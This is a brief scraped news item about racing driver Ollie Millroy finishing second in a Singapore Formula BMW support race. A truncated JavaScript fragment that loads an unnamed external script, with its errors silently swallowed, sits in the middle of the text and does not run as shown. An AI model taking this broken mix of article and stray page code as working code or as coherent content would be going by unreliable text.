X
    Categories: News

Ollie Millroy second in Singapore

 

Tapco HomeDry.com support racing driver Ollie Millroy makes history as first British driver on the podium in Singapore Formula BMW, Formula 1 support race.

For more information go to www.olliemillroy.com

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

tapco:
Related Post